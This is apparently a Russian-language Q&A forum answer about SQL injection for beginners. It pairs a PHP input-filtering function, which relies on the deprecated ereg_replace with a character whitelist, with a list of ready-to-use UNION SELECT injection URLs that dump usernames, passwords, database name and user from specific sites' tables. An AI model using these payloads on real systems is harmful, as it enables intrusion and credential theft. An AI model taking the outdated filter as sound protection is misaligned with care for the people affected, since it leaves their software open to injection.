sql инъекции для новичков

Ответ от Артур Тагиров[гуру]
а ты входные параметры фильтруешь?
на всякий:
function sqlcheck($var)
{
$var=ereg_replace('[^а-яёА-ЯЁa-zA-Z0-9_. \-]','',$var);
#оставляем только то, что разрешено
#очень важно (!) профильтровать все переменные, учавствующие в запросе, иначе будет sql уязвимость
return $var;
}
тело этой функции объявляешь где-нибудь в отдельном файле, и инклудишь его при сборке, а к самой функции обращаешься так: $id=sqlcheck($_GET['id']);
а потом уже делаешь запрос.
Инъекцию проводишь так: (и тут дальше идет тело иньекции)
(это все, если в id будет содержаться не только число, а если передается просто число, то стандартными функциями фильтруй)
примеры SQlL-инъекций:
index.php?Kat=-1/**/union/**/select/**/userpass/**/from/**/kep_uporabniki/**/where/**/IdUser=1/*
null+union+select+1,concat_ws(0x203a20,usrname,pass)+from+userso--
showcat.php?Cat_ID=null+union+select+1,concat_ws(0x203a20,name,password)+from+Users--
index.php?t=ph&id=null'+union+select+unhex( hex(concat_ws(0x203a20,id,litera,haslo,0x3c62723e3c62723e)))+from+sennik--+
index.php?sn=1'+AND+0+UNION+ALL+SELECT+1,database(),3,user(),5,6/*
index.php?ob=start&back&con=1